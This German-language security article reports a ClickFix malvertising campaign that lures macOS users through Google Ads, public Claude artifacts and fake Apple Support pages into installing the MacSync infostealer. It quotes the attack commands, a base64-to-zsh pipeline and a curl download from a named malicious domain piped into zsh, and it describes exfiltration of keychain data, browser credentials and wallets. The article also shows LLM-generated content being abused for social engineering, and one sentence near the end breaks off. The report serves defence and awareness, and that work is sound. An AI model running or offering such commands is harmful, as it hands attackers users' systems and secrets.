Aktuelle Untersuchungen zeigen eine neue Welle von ClickFix-Angriffen auf macOS, bei der Angreifer bezahlte Google-Ads mit öffentlichen Claude-Artefakten von Anthropic kombinieren. Ziel ist es, Nutzer dazu zu bringen, einen vermeintlich harmlosen Terminalbefehl auszuführen, der in Wirklichkeit den Infostealer MacSync nachlädt. Ein identifizierter schädlicher Guide innerhalb der Claude-Artefakte verzeichnete bereits über 15.600 Aufrufe – ein deutlicher Hinweis auf die Reichweite der Kampagne.
ClickFix-Angriffe: Wenn Nutzer selbst den Schadcode starten
Unter ClickFix versteht man Angriffe, bei denen die Opfer selbst die Infektion auslösen, indem sie aktiv einen vorgeschlagenen Befehl ausführen. Statt eines automatischen Downloads über Exploits setzen die Täter konsequent auf Social Engineering: Nutzer sollen davon überzeugt werden, eine „Diagnose-“ oder „Reparatur“-Anweisung im Terminal oder in der Konsole auszuführen.
Auf Windows-Systemen sind solche Szenarien seit Jahren bekannt: Gefälschte Bluescreens (BSOD), künstlich verlangsamt reagierende Browser oder manipulierte CAPTCHAs animieren Anwender dazu, PowerShell-Kommandos auszuführen, angeblich um Anzeigeprobleme zu lösen, Browserfehler zu beheben oder eine „Sicherheitsprüfung“ zu bestehen. Die neue Kampagne überträgt dieses bereits erprobte Muster zunehmend auf macOS.
Branchenberichte großer Sicherheitsanbieter belegen seit geraumer Zeit, dass macOS für Cyberkriminelle wirtschaftlich interessant geworden ist. Viele Mac-Nutzer verlassen sich jedoch weiterhin auf das Narrativ der „von Haus aus sicheren Plattform“. Diese Diskrepanz macht social-engineering-basierte macOS-Angriffe wie ClickFix besonders effektiv.
Missbrauch von Claude-Artefakten, Medium und Google Ads
Claude-Artefakte sind öffentlich zugängliche Inhalte (Code-Snippets, Schritt-für-Schritt-Anleitungen, Textnotizen u. a.), die von Nutzern mit Hilfe des LLM Claude erzeugt und unter claude.ai bereitgestellt werden. Obwohl dort klar gekennzeichnet ist, dass die Inhalte nicht moderiert werden, nehmen viele Anwender solche Seiten als vergleichsweise vertrauenswürdig wahr – insbesondere im Vergleich zu unbekannten Privatblogs.
Nach Analysen von Moonlock Lab und AdGuard schalten Angreifer gezielt Google-Suchanzeigen zu Anfragen wie „online DNS resolver“, „macOS CLI disk space analyzer“, „Homebrew“ und anderen technisch klingenden Begriffen. Wer auf diese Anzeige klickt, landet entweder auf einem öffentlichen Claude-Artefakt mit einer scheinbar hilfreichen Schritt-für-Schritt-Anleitung oder auf einer gefälschten „Apple Support“-Seite, die über Medium gehostet wird.
In beiden Fällen läuft die Strategie auf dasselbe Ziel hinaus: Die Anleitung gipfelt in einem Terminalbefehl für macOS, der als notwendiger Problemlöser dargestellt wird – tatsächlich handelt es sich dabei um die Installationsroutine für den MacSync-Loader.
Von Terminalbefehl zu MacSync-Infostealer
Angriffsbefehle: base64-Pipeline und curl-Download
Die Sicherheitsforscher identifizieren zwei zentrale Varianten der schädlichen Kommandos. In der ersten Variante wird eine Konstruktion der Form
echo „…“ | base64 -D | zsh
verwendet. Dem Nutzer wird dies als „interner Systembefehl“ oder „Diagnose-Skript“ verkauft. Technisch wird dabei ein base64-codierter Payload decodiert und direkt an die Shell zsh weitergereicht. Auf diese Weise wird ein Skript-Loader nachgeladen und sofort ausgeführt.
In der zweiten Variante kommt ein curl-Kommando zum Einsatz, etwa:
true && cur““l -SsLfk –compressed „https://raxelpak[.]com/curl/[hash]“ | zsh
Hier lädt das Standardwerkzeug curl unter Umgehung von Zertifikatswarnungen und mit Kompression einen entfernten Code von der Domain raxelpak[.]com herunter und piped diesen unmittelbar in zsh. Beide Methoden führen letztlich dazu, dass auf dem betroffenen macOS-System der MacSync-Infostealer installiert wird.
Technische Merkmale von MacSync und Datenabfluss
Nach der Infektion baut MacSync eine Verbindung zu seinem Command-and-Control-Server (C2) auf. Dafür werden ein fest im Code hinterlegtes Token und ein API-Schlüssel verwendet. Um einer Entdeckung auf Netzwerkebene zu entgehen, fälscht die Malware den User-Agent und gibt sich als regulärer macOS-Browser aus.
Die Antworten des C2-Servers werden direkt an osascript übergeben, das AppleScript-Befehle ausführt. Über diese Skripte greift MacSync auf besonders sensible Bereiche zu: Keychain-Inhalte, gespeicherte Browser-Passwörter und Cookies, Kryptowallet-Informationen sowie weitere vertrauliche Artefakte stehen im Fokus.
Die gesammelten Daten werden in der Datei /tmp/osalogging.zip gebündelt und per HTTP-POST an a2abotnet[.]com/gate übertragen. Schlägt die Übertragung fehl, fragmentiert die Malware das Archiv und startet bis zu acht Wiederholungsversuche. Anschließend werden Spuren der Aktivität möglichst umfassend gelöscht, um die forensische Analyse zu erschweren.
Einordnung der Kampagne und Trends bei macOS-Malware
Infrastruktur und Techniken ähneln bereits bekannten Kampagnen rund um den macOS-Stealer AMOS. Schon zuvor hatten Angreifer ClickFix-artige Szenarien aufgebaut, in denen über Werbung „nützliche“ Chat-Sitzungen mit ChatGPT oder Grok beworben wurden. Die aktuelle Nutzung von Claude-Artefakten setzt diesen Trend fort: öffentliche LLM-Plattformen und nutzergenerierte Inhalte werden systematisch für Malvertising und Social Engineering missbraucht.
Branchenweite Analysen, etwa im jährlich erscheinenden Verizon Data Breach Investigations Report, zeigen seit Jahren, dass Social Engineering und Fehlbedienungen zu den häufigsten Einstiegsvektoren zählen. Die Kombination aus Vertrauen in bekannte Marken (Apple, Google, etablierte LLMs), professionell aussehender Werbung und technisch wirkenden Terminalbefehlen erhöht die Erfolgswahrscheinlichkeit solcher Angriffe deutlich.
Schutzmaßnahmen für macOS-Nutzer und Unternehmen
Für Endanwender von macOS gilt: Jeder Terminalbefehl aus nicht verifizierten Quellen stellt ein erhebliches Risiko dar. Kommandos, die über Anzeigen, zufällige Blogs, LLM-Artefakte oder inoffizielle Tutorials bereitgestellt werden, sollten grundsätzlich kritisch hinterfragt werden. Empfohlen wird die Nutzung offizieller Dokumentation, Entwickler-Repositories und etablierter Support-Portale als primäre Informationsquellen.
Technisch sollten Gatekeeper und Systemupdates stets aktiviert und zeitnah eingespielt werden. Ergänzend können spezialisierte macOS-Schutzlösungen, DNS-Filter gegen Malvertising-Domains, Browser-Erweiterungen zur Werbeblockierung sowie Monitoring-Lösungen, die ungewöhnliche curl-, zsh- oder AppleScript-Aktivitäten erkennen, die Angriffsfläche weiter reduzieren.
Organisationen sollten neben technischen Kontrollen gezielt auf
Angriffe wie die aktuelle MacSync-ClickFix-Kampagne zeigen, dass nicht die technische Raffinesse allein, sondern vor allem die Beeinflussung des Nutzerverhaltens den Ausschlag gibt. Wer vor der Ausführung eines Befehls inne hält, die Quelle überprüft und im Zweifel Rücksprache mit IT- oder Security-Teams hält, kann viele dieser Angriffe bereits im Ansatz stoppen. Eine sicherheitsbewusste Unternehmenskultur und informierte macOS-Anwender sind damit ein wesentlicher Baustein, um ClickFix-Angriffe zu verhindern – noch bevor die erste Zeile im Terminal erscheint.
